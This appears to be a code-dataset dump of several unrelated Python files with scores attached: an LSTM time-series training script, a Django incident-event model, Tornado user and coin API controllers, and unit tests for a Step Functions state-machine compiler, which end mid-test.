return HttpErrorResponse(self.REQUIRED_ARG_MSG % vals)
serviceNodeId = kwargs.pop('serviceNodeId')
serviceNode = None
for node in self.nodes:
if serviceNodeId == node.id:
serviceNode = node
break
if serviceNode is None:
return HttpErrorResponse(
'ERROR: Cannot find node with serviceNode=%s' % serviceNodeId)
return HttpJsonResponse({
'serviceNode': {
'id': serviceNode.id,
'ip': serviceNode.ip,
'is_hub': self.__is_hub(serviceNode)
}
}) | 0.603348 | 0.145874 |
import os
import json
import time
import math
import matplotlib.pyplot as plt
from core.data_processor import DataLoader
from core.model import Model
def plot_results(predicted_data, true_data):
fig = plt.figure(facecolor='white')
ax = fig.add_subplot(111)
ax.plot(true_data, label='True Data')
plt.plot(predicted_data, label='Prediction')
plt.legend()
plt.show()
def plot_results_multiple(predicted_data, true_data, prediction_len):
fig = plt.figure(facecolor='white')
ax = fig.add_subplot(111)
ax.plot(true_data, label='True Data')
# Pad the list of predictions to shift it in the graph to it's correct start
for i, data in enumerate(predicted_data):
padding = [None for p in range(i * prediction_len)]
plt.plot(padding + data, label='Prediction')
plt.legend()
plt.show()
def main():
configs = json.load(open('config.json', 'r'))
if not os.path.exists(configs['model']['save_dir']): os.makedirs(configs['model']['save_dir'])
data = DataLoader(
os.path.join('data', configs['data']['filename']),
configs['data']['train_test_split'],
configs['data']['columns']
)
model = Model()
model.build_model(configs)
x, y = data.get_train_data(
seq_len=configs['data']['sequence_length'],
normalise=configs['data']['normalise']
)
'''
# in-memory training
model.train(
x,
y,
epochs = configs['training']['epochs'],
batch_size = configs['training']['batch_size'],
save_dir = configs['model']['save_dir']
)
'''
# out-of memory generative training
steps_per_epoch = math.ceil((data.len_train - configs['data']['sequence_length']) / configs['training']['batch_size'])
model.train_generator(
data_gen=data.generate_train_batch(
seq_len=configs['data']['sequence_length'],
batch_size=configs['training']['batch_size'],
normalise=configs['data']['normalise']
),
epochs=configs['training']['epochs'],
batch_size=configs['training']['batch_size'],
steps_per_epoch=steps_per_epoch,
save_dir=configs['model']['save_dir']
)
x_test, y_test = data.get_test_data(
seq_len=configs['data']['sequence_length'],
normalise=configs['data']['normalise']
)
predictions = model.predict_sequences_multiple(x_test, configs['data']['sequence_length'], configs['data']['sequence_length'])
# predictions = model.predict_sequence_full(x_test, configs['data']['sequence_length'])
# predictions = model.predict_point_by_point(x_test)
plot_results_multiple(predictions, y_test, configs['data']['sequence_length'])
# plot_results(predictions, y_test)
if __name__ == '__main__':
main() | Finance/LSTM-Neural-Network-for-Time-Series-Prediction-master/run.py | import os
import json
import time
import math
import matplotlib.pyplot as plt
from core.data_processor import DataLoader
from core.model import Model
def plot_results(predicted_data, true_data):
fig = plt.figure(facecolor='white')
ax = fig.add_subplot(111)
ax.plot(true_data, label='True Data')
plt.plot(predicted_data, label='Prediction')
plt.legend()
plt.show()
def plot_results_multiple(predicted_data, true_data, prediction_len):
fig = plt.figure(facecolor='white')
ax = fig.add_subplot(111)
ax.plot(true_data, label='True Data')
# Pad the list of predictions to shift it in the graph to it's correct start
for i, data in enumerate(predicted_data):
padding = [None for p in range(i * prediction_len)]
plt.plot(padding + data, label='Prediction')
plt.legend()
plt.show()
def main():
configs = json.load(open('config.json', 'r'))
if not os.path.exists(configs['model']['save_dir']): os.makedirs(configs['model']['save_dir'])
data = DataLoader(
os.path.join('data', configs['data']['filename']),
configs['data']['train_test_split'],
configs['data']['columns']
)
model = Model()
model.build_model(configs)
x, y = data.get_train_data(
seq_len=configs['data']['sequence_length'],
normalise=configs['data']['normalise']
)
'''
# in-memory training
model.train(
x,
y,
epochs = configs['training']['epochs'],
batch_size = configs['training']['batch_size'],
save_dir = configs['model']['save_dir']
)
'''
# out-of memory generative training
steps_per_epoch = math.ceil((data.len_train - configs['data']['sequence_length']) / configs['training']['batch_size'])
model.train_generator(
data_gen=data.generate_train_batch(
seq_len=configs['data']['sequence_length'],
batch_size=configs['training']['batch_size'],
normalise=configs['data']['normalise']
),
epochs=configs['training']['epochs'],
batch_size=configs['training']['batch_size'],
steps_per_epoch=steps_per_epoch,
save_dir=configs['model']['save_dir']
)
x_test, y_test = data.get_test_data(
seq_len=configs['data']['sequence_length'],
normalise=configs['data']['normalise']
)
predictions = model.predict_sequences_multiple(x_test, configs['data']['sequence_length'], configs['data']['sequence_length'])
# predictions = model.predict_sequence_full(x_test, configs['data']['sequence_length'])
# predictions = model.predict_point_by_point(x_test)
plot_results_multiple(predictions, y_test, configs['data']['sequence_length'])
# plot_results(predictions, y_test)
if __name__ == '__main__':
main() | 0.389082 | 0.449997 |
from django.db import models
from django.contrib.contenttypes.fields import GenericForeignKey
from django.contrib.contenttypes.models import ContentType
from django.contrib.auth.models import User
import enum
import uuid
class EventAction(enum.Enum):
CREATED = "Created"
GENERIC_UPDATE = "Generic Update"
ATTRIBUTE_CHANGE_REQUESTED = "Attribute change requested"
ATTRIBUTE_CHANGE_APPROVED = "Attribute change approved"
ATTRIBUTE_CHANGED = "Attribute changed"
ATTRIBUTE_CHANGE_REJECTED = "Attribute change rejected"
COMMENTED = "Commented"
OUTCOME_ADDED = "Outcome added"
ENTITY_ASSIGNED = "Entity assigned"
ENTITY_REMOVED = "Entity removed"
ACTION_STARTED = "Started Action"
ACTION_COMPLETED = "Ended Action"
MEDIA_ATTACHED = "Media Attached"
WORKFLOW_ACTIONED = "Workflow Actioned"
def __str__(self):
return self.name
class AffectedAttribute(enum.Enum):
STATUS = "Status"
SEVERITY = "Severity"
OUTCOME = "Outcome"
def __str__(self):
return self.name
class Event(models.Model):
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
# action type for the event, refer enums
action = models.CharField(max_length=50, choices=[(tag.name, tag.value) for tag in EventAction])
# refers to an external entity, ex: comment, media, outcome
reference_id = models.IntegerField(null=True, blank=True)
refered_model_type = models.ForeignKey(ContentType, on_delete=models.DO_NOTHING, null=True, blank=True)
refered_model = GenericForeignKey('refered_model_type', 'reference_id')
# refers to an event linked to the current event i.e for an ATTRIBUTE_CHANGED
# event or an ATTRIBUTE_CHANGE_REJECTED event previously occured
# ATTRIBUTE_CHANGE_REQUESTED event's id
linked_event = models.ForeignKey("Event", on_delete=models.DO_NOTHING, null=True, blank=True)
# specifies additional details
description = models.TextField(null=True, blank=True)
# event intiator - should be a user
initiator = models.ForeignKey(User, on_delete=models.DO_NOTHING)
# incident related to the event
incident = models.ForeignKey("incidents.Incident", on_delete=models.DO_NOTHING)
# attribute changed by the current event action
affected_attribute = models.CharField(max_length=50, choices=[(tag.name, tag.value) for tag in AffectedAttribute], null=True, blank=True)
created_date = models.DateTimeField(auto_now_add=True)
class Meta:
ordering = ('created_date',) | backend/src/events/models.py | from django.db import models
from django.contrib.contenttypes.fields import GenericForeignKey
from django.contrib.contenttypes.models import ContentType
from django.contrib.auth.models import User
import enum
import uuid
class EventAction(enum.Enum):
CREATED = "Created"
GENERIC_UPDATE = "Generic Update"
ATTRIBUTE_CHANGE_REQUESTED = "Attribute change requested"
ATTRIBUTE_CHANGE_APPROVED = "Attribute change approved"
ATTRIBUTE_CHANGED = "Attribute changed"
ATTRIBUTE_CHANGE_REJECTED = "Attribute change rejected"
COMMENTED = "Commented"
OUTCOME_ADDED = "Outcome added"
ENTITY_ASSIGNED = "Entity assigned"
ENTITY_REMOVED = "Entity removed"
ACTION_STARTED = "Started Action"
ACTION_COMPLETED = "Ended Action"
MEDIA_ATTACHED = "Media Attached"
WORKFLOW_ACTIONED = "Workflow Actioned"
def __str__(self):
return self.name
class AffectedAttribute(enum.Enum):
STATUS = "Status"
SEVERITY = "Severity"
OUTCOME = "Outcome"
def __str__(self):
return self.name
class Event(models.Model):
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
# action type for the event, refer enums
action = models.CharField(max_length=50, choices=[(tag.name, tag.value) for tag in EventAction])
# refers to an external entity, ex: comment, media, outcome
reference_id = models.IntegerField(null=True, blank=True)
refered_model_type = models.ForeignKey(ContentType, on_delete=models.DO_NOTHING, null=True, blank=True)
refered_model = GenericForeignKey('refered_model_type', 'reference_id')
# refers to an event linked to the current event i.e for an ATTRIBUTE_CHANGED
# event or an ATTRIBUTE_CHANGE_REJECTED event previously occured
# ATTRIBUTE_CHANGE_REQUESTED event's id
linked_event = models.ForeignKey("Event", on_delete=models.DO_NOTHING, null=True, blank=True)
# specifies additional details
description = models.TextField(null=True, blank=True)
# event intiator - should be a user
initiator = models.ForeignKey(User, on_delete=models.DO_NOTHING)
# incident related to the event
incident = models.ForeignKey("incidents.Incident", on_delete=models.DO_NOTHING)
# attribute changed by the current event action
affected_attribute = models.CharField(max_length=50, choices=[(tag.name, tag.value) for tag in AffectedAttribute], null=True, blank=True)
created_date = models.DateTimeField(auto_now_add=True)
class Meta:
ordering = ('created_date',) | 0.548674 | 0.097133 |
import logging
import datetime
import tornado.escape
from config import BaseController
from config.dmls_api import USERS
class UserRankController(BaseController):
"""/v1/user_rank"""
def get(self):
limit = self.get_argument("limit")
rank_list = self.select_all(USERS["USER_RANK"], {"limit": limit})
self.write(dict(rank_list=rank_list))
class TargetUserRankController(BaseController):
"""/v1/target_user_rank"""
def get(self):
w_id = self.get_argument("w_id")
rank_list = self.select_all(USERS["ALL_RANK"], {})
l = len(rank_list)
for user_pos in range(l):
if rank_list[user_pos]["w_id"] == w_id:
break
user_pos += 1
self.write(dict(user_pos=user_pos))
class UserSignupController(BaseController):
"""/v1/user_signup"""
def post(self):
user_name = self.get_argument("user_name")
avatar = self.get_argument("avatar")
w_id = self.get_argument("w_id")
params = {"user_name": user_name, "avatar": avatar, "w_id": w_id}
user_data = self.find_data(USERS["FIND_USER"], params)
ret = 1 # has expection
if user_data:
ret = 2 # user exist, then FE should jump to "/v1/get_coins"
else:
ret = self.insert_data(USERS["USER_INSERT"], params)
# self.write(dict(ret=ret))
self.write(dict(ret=ret))
class UserSigninController(BaseController):
"""/v1/user_signin"""
def post(self):
w_id = self.get_argument("w_id")
params = {"w_id": w_id}
user_data = self.find_data(USERS["FIND_USER"], params)
ret = 1
if user_data:
ret = 0
current_time = datetime.datetime.combine(
self.current_time_obj(),
datetime.time.min
)
get_coin_time = datetime.datetime.combine(
user_data["get_login_coin_time"],
datetime.time.min
)
need_coins = (current_time - get_coin_time).days >= 1
logging.warn(current_time)
logging.warn(user_data["get_login_coin_time"])
logging.warn((current_time - get_coin_time).days)
del user_data["create_time"]
del user_data["get_login_coin_time"]
self.write(dict(ret=ret, user_data=user_data, need_coins=need_coins))
else:
self.write(dict(ret=ret))
class UserInfo(BaseController):
"""/v1/user_info/([0-9]+)"""
def get(self, user_id):
user_id = int(user_id)
params = {"challenger_id": user_id}
user_info = self.select_all(USERS["USER_INFO"], params)
user_info = user_info[0]
self.write(dict(user_info=user_info))
class GetCoinsController(BaseController):
"""/v1/get_coins"""
def post(self):
w_id = self.get_argument("w_id")
coins = self.get_argument("coins")
login = self.get_argument("login") # bool
params = {"w_id": w_id}
user_data = self.find_data(USERS["FIND_USER"], params)
ret = 1
if user_data:
ret = 0
coin_params = {
"user_id": user_data["id"],
"coins": coins
}
ret = self.update_data(USERS["COIN_UPDATE"], coin_params)
if login:
login_params = {
"user_id": user_data["id"],
"current_time": self.current_time()
}
ret = self.update_data(USERS["LOGIN_COIN_TIME_UPDATE"], login_params)
self.write(dict(ret=ret)) | apis/user.py | import logging
import datetime
import tornado.escape
from config import BaseController
from config.dmls_api import USERS
class UserRankController(BaseController):
"""/v1/user_rank"""
def get(self):
limit = self.get_argument("limit")
rank_list = self.select_all(USERS["USER_RANK"], {"limit": limit})
self.write(dict(rank_list=rank_list))
class TargetUserRankController(BaseController):
"""/v1/target_user_rank"""
def get(self):
w_id = self.get_argument("w_id")
rank_list = self.select_all(USERS["ALL_RANK"], {})
l = len(rank_list)
for user_pos in range(l):
if rank_list[user_pos]["w_id"] == w_id:
break
user_pos += 1
self.write(dict(user_pos=user_pos))
class UserSignupController(BaseController):
"""/v1/user_signup"""
def post(self):
user_name = self.get_argument("user_name")
avatar = self.get_argument("avatar")
w_id = self.get_argument("w_id")
params = {"user_name": user_name, "avatar": avatar, "w_id": w_id}
user_data = self.find_data(USERS["FIND_USER"], params)
ret = 1 # has expection
if user_data:
ret = 2 # user exist, then FE should jump to "/v1/get_coins"
else:
ret = self.insert_data(USERS["USER_INSERT"], params)
# self.write(dict(ret=ret))
self.write(dict(ret=ret))
class UserSigninController(BaseController):
"""/v1/user_signin"""
def post(self):
w_id = self.get_argument("w_id")
params = {"w_id": w_id}
user_data = self.find_data(USERS["FIND_USER"], params)
ret = 1
if user_data:
ret = 0
current_time = datetime.datetime.combine(
self.current_time_obj(),
datetime.time.min
)
get_coin_time = datetime.datetime.combine(
user_data["get_login_coin_time"],
datetime.time.min
)
need_coins = (current_time - get_coin_time).days >= 1
logging.warn(current_time)
logging.warn(user_data["get_login_coin_time"])
logging.warn((current_time - get_coin_time).days)
del user_data["create_time"]
del user_data["get_login_coin_time"]
self.write(dict(ret=ret, user_data=user_data, need_coins=need_coins))
else:
self.write(dict(ret=ret))
class UserInfo(BaseController):
"""/v1/user_info/([0-9]+)"""
def get(self, user_id):
user_id = int(user_id)
params = {"challenger_id": user_id}
user_info = self.select_all(USERS["USER_INFO"], params)
user_info = user_info[0]
self.write(dict(user_info=user_info))
class GetCoinsController(BaseController):
"""/v1/get_coins"""
def post(self):
w_id = self.get_argument("w_id")
coins = self.get_argument("coins")
login = self.get_argument("login") # bool
params = {"w_id": w_id}
user_data = self.find_data(USERS["FIND_USER"], params)
ret = 1
if user_data:
ret = 0
coin_params = {
"user_id": user_data["id"],
"coins": coins
}
ret = self.update_data(USERS["COIN_UPDATE"], coin_params)
if login:
login_params = {
"user_id": user_data["id"],
"current_time": self.current_time()
}
ret = self.update_data(USERS["LOGIN_COIN_TIME_UPDATE"], login_params)
self.write(dict(ret=ret)) | 0.256925 | 0.070464 |
import unittest
from .util import StateTestCase
class TestTaskState(StateTestCase):
"""Tests for the Task state"""
SUCCESSFUL_CASES = [
(
"Should include a basic task",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
Action()
""",
{
"StartAt": "Action-db6e42286ffe8ccd217c1459c416db7c",
"States": {
"Action-db6e42286ffe8ccd217c1459c416db7c": {
"Type": "Task",
"Resource": "${LambdaFunctionAction}",
"Parameters": {
"data.$": "$",
"meta": {
"sfn_execution_name.$": "$$.Execution.Name",
"sfn_state_machine_name.$": "$$.StateMachine.Name",
"sfn_state_name.$": "$$.State.Name",
"trace_id.$": "$.__trace.id",
"trace_source.$": "$.__trace.source",
},
},
"InputPath": "$",
"ResultPath": None,
"TimeoutSeconds": 300,
"End": True,
"Retry": [
{
"ErrorEquals": [
"Lambda.ServiceException",
"Lambda.AWSLambdaException",
"Lambda.SdkClientException",
],
"IntervalSeconds": 2,
"MaxAttempts": 6,
"BackoffRate": 2,
}
],
}
},
},
),
(
"Should set lambda service",
"""
class Action(Task):
service = "lambda"
async def run(event, context):
return
def main(data):
Action()
""",
{
"StartAt": "Action-db6e42286ffe8ccd217c1459c416db7c",
"States": {
"Action-db6e42286ffe8ccd217c1459c416db7c": {
"Type": "Task",
"Resource": "${LambdaFunctionAction}",
"Parameters": {
"data.$": "$",
"meta": {
"sfn_execution_name.$": "$$.Execution.Name",
"sfn_state_machine_name.$": "$$.StateMachine.Name",
"sfn_state_name.$": "$$.State.Name",
"trace_id.$": "$.__trace.id",
"trace_source.$": "$.__trace.source",
},
},
"InputPath": "$",
"ResultPath": None,
"TimeoutSeconds": 300,
"End": True,
"Retry": [
{
"ErrorEquals": [
"Lambda.ServiceException",
"Lambda.AWSLambdaException",
"Lambda.SdkClientException",
],
"IntervalSeconds": 2,
"MaxAttempts": 6,
"BackoffRate": 2,
}
],
}
},
},
),
(
"Should set lambda:pexpm-runner service",
"""
class Action(Task):
service = "lambda:pexpm-runner"
async def run(event, context):
return
def main(data):
Action(key="action")
""",
{
"StartAt": "action",
"States": {
"action": {
"Type": "Task",
"Resource": "${LambdaFunctionAction}",
"Parameters": {
"package_name": "${PackageNameAction}",
"package_version": "${PackageVersionAction}",
"command": ["${PackageNameAction}", "run"],
"include_parent_environment": True,
"return_stdout": True,
"environment": {
"SFN_EXECUTION_NAME.$": "$$.Execution.Name",
"SFN_STATE_NAME.$": "$$.State.Name",
"SFN_STATE_MACHINE_NAME.$": "$$.StateMachine.Name",
"TRACE_ID.$": "$.__trace.id",
"TRACE_SOURCE.$": "$.__trace.source",
"SFN_INPUT_VALUE.$": "$",
},
},
"InputPath": "$",
"ResultPath": None,
"TimeoutSeconds": 300,
"End": True,
"Retry": [
{
"ErrorEquals": [
"Lambda.ServiceException",
"Lambda.AWSLambdaException",
"Lambda.SdkClientException",
],
"IntervalSeconds": 2,
"MaxAttempts": 6,
"BackoffRate": 2,
}
],
}
},
},
),
(
"Should set ecs service",
"""
class Action(Task):
service = "ecs"
async def run(event, context):
return
def main(data):
Action()
""",
{
"StartAt": "Action-db6e42286ffe8ccd217c1459c416db7c",
"States": {
"Action-db6e42286ffe8ccd217c1459c416db7c": {
"Type": "Task",
"Resource": "arn:aws:states:::ecs:runTask.sync",
"Parameters": {
"LaunchType": "FARGATE",
"Cluster": "${ECSClusterArn}",
"TaskDefinition": "${ECSTaskDefinitionAction}",
"NetworkConfiguration": {
"AwsvpcConfiguration": {
"AssignPublicIp": "DISABLED",
"SecurityGroups": [
"${DatabaseSecurityGroup}",
"${PrivateLoadBalancerSecurityGroup}",
],
"Subnets": [
"${Subnet0}",
"${Subnet1}",
"${Subnet2}",
"${Subnet3}",
],
}
},
"Overrides": {
"ContainerOverrides": [
{
"Name": "Action",
"Environment": [
{
"Name": "SFN_EXECUTION_NAME",
"Value.$": "$$.Execution.Name",
},
{
"Name": "SFN_STATE_NAME",
"Value.$": "$$.State.Name",
},
{
"Name": "SFN_STATE_MACHINE_NAME",
"Value.$": "$$.StateMachine.Name",
},
{
"Name": "TRACE_ID",
"Value.$": "$.__trace.id",
},
{
"Name": "TRACE_SOURCE",
"Value.$": "$.__trace.source",
},
],
}
]
},
},
"InputPath": "$",
"ResultPath": None,
"TimeoutSeconds": 300,
"End": True,
}
},
},
),
(
"Should set ecs:worker service",
"""
class Action(Task):
service = "ecs:worker"
async def run(event, context):
return
def main(data):
Action()
""",
{
"StartAt": "Action-db6e42286ffe8ccd217c1459c416db7c",
"States": {
"Action-db6e42286ffe8ccd217c1459c416db7c": {
"Type": "Task",
"Resource": "arn:aws:states:::sqs:sendMessage.waitForTaskToken",
"Parameters": {
"QueueUrl": "${QueueUrlAction}",
"MessageGroupId.$": "States.Format('{}_{}', $$.Execution.Name, $$.State.EnteredTime)",
"MessageAttributes": {
"SFN_EXECUTION_NAME": {
"DataType": "String",
"StringValue.$": "$$.Execution.Name",
},
"SFN_STATE_NAME": {
"DataType": "String",
"StringValue.$": "$$.State.Name",
},
"SFN_STATE_MACHINE_NAME": {
"DataType": "String",
"StringValue.$": "$$.StateMachine.Name",
},
# Pass tracing metadata from the input data object
"TRACE_ID": {
"DataType": "String",
"StringValue.$": "$.__trace.id",
},
"TRACE_SOURCE": {
"DataType": "String",
"StringValue.$": "$.__trace.source",
},
},
"MessageBody": {
"Input.$": "$",
"TaskToken.$": "$$.Task.Token",
},
},
"InputPath": "$",
"ResultPath": None,
"TimeoutSeconds": 300,
"End": True,
}
},
},
),
(
"Should accept key option",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
Action(key="action")
""",
{
"StartAt": "action",
"States": {
"action": {
"Type": "Task",
"Resource": "${LambdaFunctionAction}",
"Parameters": {
"data.$": "$",
"meta": {
"sfn_execution_name.$": "$$.Execution.Name",
"sfn_state_machine_name.$": "$$.StateMachine.Name",
"sfn_state_name.$": "$$.State.Name",
"trace_id.$": "$.__trace.id",
"trace_source.$": "$.__trace.source",
},
},
"InputPath": "$",
"ResultPath": None,
"TimeoutSeconds": 300,
"End": True,
"Retry": [
{
"ErrorEquals": [
"Lambda.ServiceException",
"Lambda.AWSLambdaException",
"Lambda.SdkClientException",
],
"IntervalSeconds": 2,
"MaxAttempts": 6,
"BackoffRate": 2,
}
],
}
},
},
),
(
"Should accept timeout option",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
Action(key="action", timeout=10)
""",
{
"StartAt": "action",
"States": {
"action": {
"Type": "Task",
"Resource": "${LambdaFunctionAction}",
"Parameters": {
"data.$": "$",
"meta": {
"sfn_execution_name.$": "$$.Execution.Name",
"sfn_state_machine_name.$": "$$.StateMachine.Name",
"sfn_state_name.$": "$$.State.Name",
"trace_id.$": "$.__trace.id",
"trace_source.$": "$.__trace.source",
},
},
"InputPath": "$",
"ResultPath": None,
"TimeoutSeconds": 10,
"End": True,
"Retry": [
{
"ErrorEquals": [
"Lambda.ServiceException",
"Lambda.AWSLambdaException",
"Lambda.SdkClientException",
],
"IntervalSeconds": 2,
"MaxAttempts": 6,
"BackoffRate": 2,
}
],
}
},
},
),
(
"Should accept input data",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
Action(data["input"], key="action")
""",
{
"StartAt": "action",
"States": {
"action": {
"Type": "Task",
"Resource": "${LambdaFunctionAction}",
"Parameters": {
"data.$": "$['input']",
"meta": {
"sfn_execution_name.$": "$$.Execution.Name",
"sfn_state_machine_name.$": "$$.StateMachine.Name",
"sfn_state_name.$": "$$.State.Name",
"trace_id.$": "$.__trace.id",
"trace_source.$": "$.__trace.source",
},
},
"InputPath": "$",
"ResultPath": None,
"TimeoutSeconds": 300,
"End": True,
"Retry": [
{
"ErrorEquals": [
"Lambda.ServiceException",
"Lambda.AWSLambdaException",
"Lambda.SdkClientException",
],
"IntervalSeconds": 2,
"MaxAttempts": 6,
"BackoffRate": 2,
}
],
}
},
},
),
(
"Should set result path",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
data["output"] = Action(data["input"], key="action")
""",
{
"StartAt": "action",
"States": {
"action": {
"Type": "Task",
"Resource": "${LambdaFunctionAction}",
"Parameters": {
"data.$": "$['input']",
"meta": {
"sfn_execution_name.$": "$$.Execution.Name",
"sfn_state_machine_name.$": "$$.StateMachine.Name",
"sfn_state_name.$": "$$.State.Name",
"trace_id.$": "$.__trace.id",
"trace_source.$": "$.__trace.source",
},
},
"InputPath": "$",
"ResultPath": "$['output']",
"TimeoutSeconds": 300,
"End": True,
"Retry": [
{
"ErrorEquals": [
"Lambda.ServiceException",
"Lambda.AWSLambdaException",
"Lambda.SdkClientException",
],
"IntervalSeconds": 2,
"MaxAttempts": 6,
"BackoffRate": 2,
}
],
}
},
},
),
(
"Should include nested state machine",
"""
def nested(data):
return
def main(data):
nested(key="nested")
""",
{
"StartAt": "nested",
"States": {
"nested": {
"Type": "Task",
"Resource": "arn:aws:states:::states:startExecution.sync",
"Parameters": {
"Input": {
"AWS_STEP_FUNCTIONS_STARTED_BY_EXECUTION_ID.$": "$$.Execution.Id",
"__trace.$": "$.__trace",
"data.$": "$",
},
"StateMachineArn": "${StateMachinenested}",
},
"InputPath": "$",
"ResultPath": None,
"TimeoutSeconds": 300,
"End": True,
}
},
},
),
(
"Should catch unnamed exception",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
try:
Action(key="action")
except:
return
""",
{
"StartAt": "action",
"States": {
"action": {
"Type": "Task",
"Resource": "${LambdaFunctionAction}",
"Parameters": {
"data.$": "$",
"meta": {
"sfn_execution_name.$": "$$.Execution.Name",
"sfn_state_machine_name.$": "$$.StateMachine.Name",
"sfn_state_name.$": "$$.State.Name",
"trace_id.$": "$.__trace.id",
"trace_source.$": "$.__trace.source",
},
},
"InputPath": "$",
"ResultPath": None,
"TimeoutSeconds": 300,
"End": True,
"Catch": [
{
"ErrorEquals": ["States.ALL"],
"ResultPath": "$.error",
"Next": "Succeed-d1d0f861f06db686c59bfded9f95b5c4",
}
],
"Retry": [
{
"ErrorEquals": [
"Lambda.ServiceException",
"Lambda.AWSLambdaException",
"Lambda.SdkClientException",
],
"IntervalSeconds": 2,
"MaxAttempts": 6,
"BackoffRate": 2,
}
],
},
"Succeed-d1d0f861f06db686c59bfded9f95b5c4": {"Type": "Succeed"},
},
},
),
(
"Should catch base exception",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
try:
Action(key="action")
except Exception:
return
""",
{
"StartAt": "action",
"States": {
"action": {
"Type": "Task",
"Resource": "${LambdaFunctionAction}",
"Parameters": {
"data.$": "$",
"meta": {
"sfn_execution_name.$": "$$.Execution.Name",
"sfn_state_machine_name.$": "$$.StateMachine.Name",
"sfn_state_name.$": "$$.State.Name",
"trace_id.$": "$.__trace.id",
"trace_source.$": "$.__trace.source",
},
},
"InputPath": "$",
"ResultPath": None,
"TimeoutSeconds": 300,
"End": True,
"Catch": [
{
"ErrorEquals": ["Exception"],
"ResultPath": "$.error",
"Next": "Succeed-d1d0f861f06db686c59bfded9f95b5c4",
}
],
"Retry": [
{
"ErrorEquals": [
"Lambda.ServiceException",
"Lambda.AWSLambdaException",
"Lambda.SdkClientException",
],
"IntervalSeconds": 2,
"MaxAttempts": 6,
"BackoffRate": 2,
}
],
},
"Succeed-d1d0f861f06db686c59bfded9f95b5c4": {"Type": "Succeed"},
},
},
),
(
"Should catch custom exception",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
try:
Action(key="action")
except CustomError:
return
""",
{
"StartAt": "action",
"States": {
"action": {
"Type": "Task",
"Resource": "${LambdaFunctionAction}",
"Parameters": {
"data.$": "$",
"meta": {
"sfn_execution_name.$": "$$.Execution.Name",
"sfn_state_machine_name.$": "$$.StateMachine.Name",
"sfn_state_name.$": "$$.State.Name",
"trace_id.$": "$.__trace.id",
"trace_source.$": "$.__trace.source",
},
},
"InputPath": "$",
"ResultPath": None,
"TimeoutSeconds": 300,
"End": True,
"Catch": [
{
"ErrorEquals": ["CustomError"],
"ResultPath": "$.error",
"Next": "Succeed-d1d0f861f06db686c59bfded9f95b5c4",
}
],
"Retry": [
{
"ErrorEquals": [
"Lambda.ServiceException",
"Lambda.AWSLambdaException",
"Lambda.SdkClientException",
],
"IntervalSeconds": 2,
"MaxAttempts": 6,
"BackoffRate": 2,
}
],
},
"Succeed-d1d0f861f06db686c59bfded9f95b5c4": {"Type": "Succeed"},
},
},
),
(
"Should catch multiple exceptions in a single handler",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
try:
Action(key="action")
except (CustomError1, CustomError2):
return
""",
{
"StartAt": "action",
"States": {
"action": {
"Type": "Task",
"Resource": "${LambdaFunctionAction}",
"Parameters": {
"data.$": "$",
"meta": {
"sfn_execution_name.$": "$$.Execution.Name",
"sfn_state_machine_name.$": "$$.StateMachine.Name",
"sfn_state_name.$": "$$.State.Name",
"trace_id.$": "$.__trace.id",
"trace_source.$": "$.__trace.source",
},
},
"InputPath": "$",
"ResultPath": None,
"TimeoutSeconds": 300,
"End": True,
"Catch": [
{
"ErrorEquals": ["CustomError1", "CustomError2"],
"ResultPath": "$.error",
"Next": "Succeed-d1d0f861f06db686c59bfded9f95b5c4",
}
],
"Retry": [
{
"ErrorEquals": [
"Lambda.ServiceException",
"Lambda.AWSLambdaException",
"Lambda.SdkClientException",
],
"IntervalSeconds": 2,
"MaxAttempts": 6,
"BackoffRate": 2,
}
],
},
"Succeed-d1d0f861f06db686c59bfded9f95b5c4": {"Type": "Succeed"},
},
},
),
(
"Should parse multiple exception handlers",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
try:
Action(key="action")
except CustomError1:
return
except CustomError2:
return
""",
{
"StartAt": "action",
"States": {
"action": {
"Type": "Task",
"Resource": "${LambdaFunctionAction}",
"Parameters": {
"data.$": "$",
"meta": {
"sfn_execution_name.$": "$$.Execution.Name",
"sfn_state_machine_name.$": "$$.StateMachine.Name",
"sfn_state_name.$": "$$.State.Name",
"trace_id.$": "$.__trace.id",
"trace_source.$": "$.__trace.source",
},
},
"InputPath": "$",
"ResultPath": None,
"TimeoutSeconds": 300,
"End": True,
"Catch": [
{
"ErrorEquals": ["CustomError1"],
"ResultPath": "$.error",
"Next": "Succeed-d1d0f861f06db686c59bfded9f95b5c4",
},
{
"ErrorEquals": ["CustomError2"],
"ResultPath": "$.error",
"Next": "Succeed-d1d0f861f06db686c59bfded9f95b5c4",
},
],
"Retry": [
{
"ErrorEquals": [
"Lambda.ServiceException",
"Lambda.AWSLambdaException",
"Lambda.SdkClientException",
],
"IntervalSeconds": 2,
"MaxAttempts": 6,
"BackoffRate": 2,
}
],
},
"Succeed-d1d0f861f06db686c59bfded9f95b5c4": {"Type": "Succeed"},
},
},
),
(
"Should add retry to the task",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
with retry(
on_exceptions=[CustomError, States.TaskFailed],
interval=10,
max_attempts=5,
backoff_rate=3.0
):
Action()
""",
{
"StartAt": "Action-db6e42286ffe8ccd217c1459c416db7c",
"States": {
"Action-db6e42286ffe8ccd217c1459c416db7c": {
"Type": "Task",
"Resource": "${LambdaFunctionAction}",
"Parameters": {
"data.$": "$",
"meta": {
"sfn_execution_name.$": "$$.Execution.Name",
"sfn_state_machine_name.$": "$$.StateMachine.Name",
"sfn_state_name.$": "$$.State.Name",
"trace_id.$": "$.__trace.id",
"trace_source.$": "$.__trace.source",
},
},
"InputPath": "$",
"ResultPath": None,
"TimeoutSeconds": 300,
"End": True,
"Retry": [
{
"ErrorEquals": [
"Lambda.ServiceException",
"Lambda.AWSLambdaException",
"Lambda.SdkClientException",
],
"IntervalSeconds": 2,
"MaxAttempts": 6,
"BackoffRate": 2,
},
{
"ErrorEquals": ["CustomError", "States.TaskFailed"],
"IntervalSeconds": 10,
"MaxAttempts": 5,
"BackoffRate": 3.0,
},
],
}
},
},
),
(
"Should add retry to the task with default values",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
with retry():
Action()
""",
{
